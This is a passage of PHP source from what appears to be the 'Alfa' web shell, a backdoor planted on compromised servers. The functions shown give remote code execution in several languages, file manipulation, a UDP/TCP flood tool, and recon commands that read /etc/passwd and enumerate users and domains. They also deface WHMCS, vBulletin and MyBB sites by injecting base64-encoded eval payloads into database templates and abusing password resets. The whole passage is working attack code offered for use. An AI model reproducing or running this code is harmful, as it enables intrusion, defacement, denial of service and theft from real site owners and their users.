3164alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
3165}else{
3166$cmd_rename = true;
3167}
3168}else{
3169$alfa1_escape = addslashes($_POST["alfa1"]);
3170}
3171if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
3172echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
3173}
3174echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
3175break;
3176case 'touch':
3177@chdir($_POST['c']);
3178if( !empty($_POST['alfa3']) ) {
3179$time = strtotime($_POST['alfa3']);
3180if($time){
3181$touched = false;
3182if($chdir_fals&&$alfa_canruncmd){
3183 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
3184 $touched = true;
3185}
3186if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
3187echo 'Fail!';
3188else
3189echo 'Touched!';
3190} else echo 'Bad time format!';
3191}
3192clearstatcache();
3193echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
3194break;
3195case 'image':
3196@chdir($_POST['c']);
3197echo('<hr>');
3198$file = $_POST['alfa1'];
3199$image_info = @getimagesize($file);
3200if(is_array($image_info)||$chdir_fals){
3201$width = (int)$image_info[0];
3202$height = (int)$image_info[1];
3203if($chdir_fals&&$alfa_canruncmd){
3204 $source = alfaEx("cat '".addslashes($file)."' | base64");
3205 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
3206 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
3207 $image_info['mime'] = $mime[1];
3208}else{
3209 $source = __ZW5jb2Rlcg(__read_file($file, false));
3210}
3211$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
3212if($width > 800){$width = 800;}
3213echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
3214}
3215break;
3216}
3217echo '</div>';
3218alfaFooter();
3219}
3220function findicon($file,$type){
3221$s = 'http://solevisible.com/icons/';
3222$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
3223if($type!='file'){
3224return ($file=='..'?$s.'back.png':$s.'folder.png');
3225}else{
3226$ext = explode('.',$file);
3227$ext = end($ext);
3228$ext = strtolower($ext);
3229return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
3230}
3231}
3232function alfadlfile(){
3233if(isset($_POST['c'],$_POST['file'])){
3234$basename = rawurldecode(basename($_POST['file']));
3235$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
3236$alfa_canruncmd = _alfa_can_runCommand(true,true);
3237if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
3238ob_start("ob_gzhandler", 4096);
3239header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
3240header("Content-Type: application/octet-stream");
3241if($GLOBALS["glob_chdir_false"]){
3242 $randname = $basename.rand(111,9999);
3243 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3244 $filepath = $scriptpath."/".$randname;
3245 if(_alfa_is_writable($scriptpath)){
3246 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
3247 readfile($filepath);
3248 @unlink($filepath);
3249 }else{
3250 alfaEx("cat '".addslashes($_POST["file"])."'");
3251 }
3252}else{
3253 readfile($_POST['file']);
3254}
3255}else echo('Error...!');}}
3256function __alfa_set_cookie($key, $value){
3257 $_COOKIE[$key] = $value;
3258 @setcookie($key, $value, time()+(86400 * 7), '/');
3259}
3260function alfaphpeval(){
3261if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
3262 $tempdir = $_COOKIE["eval_tmpdir"];
3263}else{
3264 $tempdir = dirname(alfaEx("mktemp"));
3265 __alfa_set_cookie("eval_tmpdir", $tempdir);
3266}
3267alfahead();
3268if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
3269echo '<div class=header>';
3270ob_start();
3271$INI=ini_get_all();
3272print '<table border=0><tr>'
3273.'<td class="listing"><font class="highlight_txt">Param</td>'
3274.'<td class="listing"><font class="highlight_txt">Global value</td>'
3275.'<td class="listing"><font class="highlight_txt">Local Value</td>'
3276.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
3277foreach ($INI as $param => $values)
3278print "\n".'<tr>'
3279.'<td class="listing"><b>'.$param.'</td>'
3280.'<td class="listing">'.$values['global_value'].' </td>'
3281.'<td class="listing">'.$values['local_value'].' </td>'
3282.'<td class="listing">'.$values['access'].' </td></tr>';
3283$tmp = ob_get_clean();
3284$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3285$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3286echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3287}
3288if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
3289echo '<div class=header><style>.p {color:#000;}</style>';
3290ob_start();
3291phpinfo();
3292$tmp = ob_get_clean();
3293$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3294$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3295echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3296}
3297if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
3298echo '<div class=header>';
3299ob_start();
3300$EXT=get_loaded_extensions();
3301echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
3302echo '</div><br>';
3303}
3304$lang_html = "";
3305foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
3306echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
3307echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
3308if(!empty($_POST['alfa1'])){
3309if($_POST['alfa3']=="php"){
3310ob_start();
3311eval('?>'.$_POST['alfa1']);
3312$result = htmlspecialchars(ob_get_clean());
3313}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
3314 $lang = $_POST['alfa3'];
3315 $filename = "temp".rand(11111,99999);
3316 $temp = $tempdir."/".$filename ;
3317 __write_file($filename, $_POST['alfa1']);
3318 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
3319 @unlink($filename);
3320 @unlink($temp);
3321}
3322echo '<textarea class="bigarea">'.$result.'</textarea>';
3323}
3324echo '</pre></div>';
3325alfafooter();
3326}
3327function alfahash(){
3328if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
3329if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
3330$stringTools = array(
3331'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
3332'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
3333'strrev ( $string )' => 'strrev($s)',
3334'bin2hex ( $string )' => 'bin2hex($s)',
3335'hex2bin ( $string )' => 'hex2bin($s)',
3336'md5 ( $string )' => 'md5($s)',
3337'sha1 ( $string )' => 'sha1($s)',
3338'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
3339'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
3340'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
3341'crypt ( $string )' => 'crypt($s)',
3342'crc32 ( $string )' => 'crc32($s)',
3343'str_rot13 ( $string )' => 'str_rot13($s)',
3344'urlencode ( $string )' => 'urlencode($s)',
3345'urldecode ( $string )' => 'urldecode($s)',
3346'full_urlencode ( $string )' => 'full_urlencode($s)',
3347'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
3348'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
3349'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
3350'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
3351'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
3352'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
3353'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
3354);
3355alfahead();
3356echo '<div class=header>';
3357echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
3358foreach($stringTools as $k => $v)
3359echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
3360echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
3361if(!empty($_POST['alfa1'])){
3362$string = addslashes($_POST['alfa2']);
3363$string = str_replace('\"','"',$string);
3364$alg = $_POST['alfa1'];
3365$code = str_replace('$s',"'".$string."'",$alg);
3366ob_start();
3367eval('echo '.$code.';');
3368$res = ob_get_contents();
3369ob_end_clean();
3370if(in_array($alg, $stringTools))echo '<textarea class="bigarea">'.htmlspecialchars($res).'</textarea>';
3371}
3372echo "</div>";
3373alfaFooter();
3374}
3375function alfados(){
3376alfahead();
3377echo '<div class=header>';
3378echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
3379if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
3380echo __pre();
3381$packets=0;
3382ignore_user_abort(true);
3383$exec_time=(int)$_POST['alfa2'];
3384$time=time();
3385$max_time=$exec_time+$time;
3386$host=$_POST['alfa1'];
3387$port=(int)$_POST['alfa3'];
3388$method=$_POST['alfa4'];
3389$out = str_repeat('X',65000);
3390while(1){
3391$packets++;
3392if(time() > $max_time){
3393break;
3394}
3395$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
3396if($fp){
3397fwrite($fp, $out);
3398fclose($fp);
3399}
3400}
3401echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
3402echo "</pre>";
3403}
3404echo '</div>';
3405alfafooter();
3406}
3407function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
3408function alfaIndexChanger(){
3409alfahead();
3410
3411echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
3412if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
3413echo __pre();
3414
3415echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
3416<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
3417";
3418$table = array('td1' =>
3419 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3420 'td2' =>
3421 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
3422 'td3' =>
3423 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
3424 'td4' =>
3425 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3426 'td5' =>
3427 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3428 'td6' =>
3429 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3430);
3431create_table($table);
3432echo "<br><div class='txtfont'>| Your Index |</div><br>
3433<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3434<input type='submit' value=' '>
3435</form></center></center>";
3436if(isset($_POST['alfa6'])){
3437$s0levisible="Powered By Solevisible";
3438$dbu = $_POST['alfa6'];
3439$path = $_POST['alfa5'];
3440$fname = $_POST['alfa4'];
3441$dbn = $_POST['alfa7'];
3442$dbp = $_POST['alfa8'];
3443$dbh = $_POST['alfa9'];
3444$index = $_POST['alfa10'];
3445$index = str_replace("\'","'",$index);
3446$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
3447$saveData = __ZW5jb2Rlcg($deface);
3448$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
3449if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3450$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3451$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
3452$soleGet = mysqli_fetch_assoc($soleSave);
3453$tempSave1 = $soleGet['message'];
3454$tempSave = str_replace("'","\'",$tempSave1);
3455$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
3456$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
3457$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
3458$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
3459if(function_exists('curl_version')){
3460$AlfaSole = new AlfaCURL(true);
3461$saveurl = $AlfaSole->Send($path."/pwreset.php");
3462$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
3463$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
3464$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
3465$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
3466__alert('File Created...');
3467echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
3468}else{
3469echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
3470}}}}
3471if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
3472echo __pre();
3473
3474echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
3475<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
3476";
3477$table = array('td1' =>
3478 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3479 'td2' =>
3480 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3481 'td3' =>
3482 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3483 'td4' =>
3484 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
3485 'td5' =>
3486 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
3487);
3488create_table($table);
3489echo "<br><div class='txtfont'>| Your Index |</div><br>
3490<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3491<input type='submit' value=' '></form></center></center>";
3492if($_POST['alfa8']=='>>'){
3493$s0levisible="Powered By Solevisible";
3494$dbu = $_POST['alfa2'];
3495$dbn = $_POST['alfa3'];
3496$dbp = $_POST['alfa4'];
3497$dbh = $_POST['alfa5'];
3498$index = $_POST['alfa6'];
3499$prefix = $_POST['alfa7'];
3500$index=str_replace("\'","'",$index);
3501$set_index = "{\${eval(base64_decode(\'";
3502$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
3503$set_index .= "\'))}}{\${exit()}}";
3504if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3505$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3506$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
3507$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
3508$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
3509@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
3510@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
3511@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
3512__alert('VB index changed...!');
3513}
3514}
3515}
3516if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
3517echo __pre();
3518
3519echo "<center><center><div class='txtfont_header'>| Mybb |</div>
3520<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
3521";
3522$table = array('td1' =>
3523 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3524 'td2' =>
3525 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3526 'td3' =>
3527 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3528 'td4' =>
3529 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3530);
3531create_table($table);
3532echo "<br><div class='txtfont'>| Your Index |</div><br>
3533<textarea name=mybbindex rows='19' cols='103'>
3534<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
3535if(isset($_POST['alfa6'])){
3536$mybb_dbh = $_POST['alfa6'];
3537$mybb_dbu = $_POST['alfa7'];
3538$mybb_dbn = $_POST['alfa8'];
3539$mybb_dbp = $_POST['alfa9'];
3540$mybb_index = $_POST['alfa10'];
3541if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
3542$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
3543$prefix="mybb_";
3544$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
3545$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
3546__alert('MyBB index changed...!');
3547}
3548}
3549}
3550echo "</div>";
3551alfafooter();
3552}
3553function alfaproc()
3554{
3555alfahead();
3556echo "<Div class=header><br><center>";
3557if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
3558$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3559if($GLOBALS['sys']=="win"){
3560$process=array(
3561"Task List" =>"tasklist /V",
3562"System Info" =>"systeminfo",
3563"Active Connections" => "netstat -an",
3564"Running Services" => "net start",
3565"User Accounts" => "net user",
3566"Show Computers" => "net view",
3567"ARP Table" => "arp -a",
3568"IP Configuration" => "ipconfig /all"
3569);}else{
3570$process=array(
3571"Process status" => "ps aux",
3572"Syslog" =>"cat /etc/syslog.conf",
3573"Resolv" => "cat /etc/resolv.conf",
3574"Hosts" =>"cat /etc/hosts",
3575"Cpuinfo"=>"cat /proc/cpuinfo",
3576"Version"=>"cat /proc/version",
3577"Sbin"=>"ls -al /usr/sbin",
3578"Interrupts"=>"cat /proc/interrupts",
3579"lsattr"=>"lsattr -va",
3580"Uptime"=>"uptime",
3581"Fstab" =>"cat /etc/fstab"
3582);}
3583foreach($process as $n => $link){
3584echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
3585}
3586echo "</center><br>";
3587if(!empty($_POST['alfa1'])){
3588echo "<pre class='ml1' style='margin-top:5px' >";
3589if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
3590echo alfaEx($cmd.$_POST['alfa1'], true);
3591echo '</pre>';
3592}
3593echo "</div>";
3594alfafooter();
3595}
3596function alfasafe(){
3597alfahead();
3598echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
3599echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
3600if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
3601if(!_alfa_file_exists("/etc/virtual/domainowners")){
3602echo __pre();
3603$solevisible9 = _alfa_file('/etc/named.conf');
3604if(is_array($solevisible9)){
3605foreach($solevisible9 as $solevisible13){
3606if(@eregi('zone',$solevisible13)){
3607preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3608if(strlen(trim($solevisible14[1][0])) > 2){
3609echo $solevisible14[1][0].'<br>';
3610}}}
3611}
3612}else{
3613echo __pre();
3614$users = _alfa_file("/etc/virtual/domainowners");
3615if(is_array($users)){
3616foreach($users as $boz){
3617$dom = explode(":",$boz);
3618echo $dom[0]."\n";}}}}
3619if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
3620echo '
3621<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
3622if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
3623if(!_alfa_file_exists("/etc/virtual/domainowners")){
3624$site = trim($_POST['alfa7']);
3625$rep = str_replace(array("https://","http://","www."),"",$site);
3626$user = "";
3627if(function_exists("posix_getpwuid") && function_exists("fileowner")){
3628 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
3629 $user = $user['name'];
3630 }
3631}else{
3632 if(_alfa_can_runCommand(true,true)){
3633 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
3634 }
3635}
3636if(!empty($user)&&$user!='root'){
3637echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
3638}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
3639}else{
3640$site = trim($_POST['alfa7']);
3641$rep = str_replace(array("https://","http://","www."),"",$site);
3642$users = _alfa_file("/etc/virtual/domainowners");
3643foreach($users as $boz){
3644$ex = explode(":",$boz);
3645if($ex[0] == $rep){
3646echo __pre()."<center><table border='1'>
3647<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
3648<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
3649if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
3650if(!_alfa_file_exists("/etc/virtual/domainowners")){
3651echo __pre();
3652$i = 0;
3653while ($i < 60000) {
3654$line = @posix_getpwuid($i);
3655if (!empty($line)) {
3656while (list ($key, $vl) = each($line)){
3657echo $vl."\n";
3658break;}}$i++;}
3659}else{echo __pre();
3660$users = _alfa_file("/etc/virtual/domainowners");
3661foreach($users as $boz){
3662$user = explode(":",$boz);
3663echo trim($user[1]).'<br>';}}}
3664if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
3665echo __pre();
3666if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
3667for($uid=0;$uid<60000;$uid++){
3668$ara = @posix_getpwuid($uid);
3669if(!empty($ara)){
3670while(list ($key, $val) = each($ara)){
3671echo "$val:";
3672}echo "\n";}}
3673}else{__alert('failed...');}}
3674if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
